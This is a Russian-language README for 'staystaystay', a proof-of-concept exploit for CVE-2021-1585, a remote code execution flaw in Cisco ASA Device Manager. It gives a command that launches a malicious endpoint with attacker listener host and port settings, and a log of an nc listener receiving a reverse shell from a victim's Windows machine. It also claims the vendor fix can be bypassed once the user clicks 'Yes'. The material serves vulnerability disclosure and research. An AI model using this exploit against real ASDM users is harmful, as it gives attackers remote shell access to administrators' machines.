
Доказательство концепции для CVE-2021-1585: Cisco ASA Device Manager RCE
staystaystay — это доказательство концепции эксплуатации для CVE-2021-1585, проблемы RCE типа «человек посередине» или злонамеренная конечная точка, затрагивающая Cisco ASA Device Manager (ASDM). Проблема была первоначально обнаружена Malcolm Lashley и раскрыта летом 2021 года. Однако в то время, когда я изучал это, она была неисправлена в последней версии (ASDM 7.17(1)), я наткнулся на это независимо.
Cisco "исправила" это в ASDM 7.18(1.152). Я говорю "исправила", потому что этот эксплойт все еще прекрасно работает. Пользователю просто нужно нажать "Да". Смотрите видео ниже.
Атакующие могут настроить два типа полезных нагрузок для получения обратной оболочки на жертву:
Если жертва подключает свой ASDM к staystaystay, то он внедрит настроенную полезную нагрузку, что приведет к обратной оболочке. Обратную оболочку jjs можно перехватить с помощью обычного слушателя nc (или даже Metasploit, если хотите). Опция Longtime Sunshine требует, чтобы атакующий использовал этот фреймворк.
В качестве примера следующая команда запустит staystaystay на порту 8443 с полезной нагрузкой :
jjs./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Как только жертва подключается к 8443, обратная оболочка будет сгенерирована на 10.0.0.2:1270:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
Следующее видео содержит пример эксплуатации с Longtime Sunshine:
Следующее видео демонстрирует атаку на исправленную версию:
Описание на AttackerKB можно найти здесь: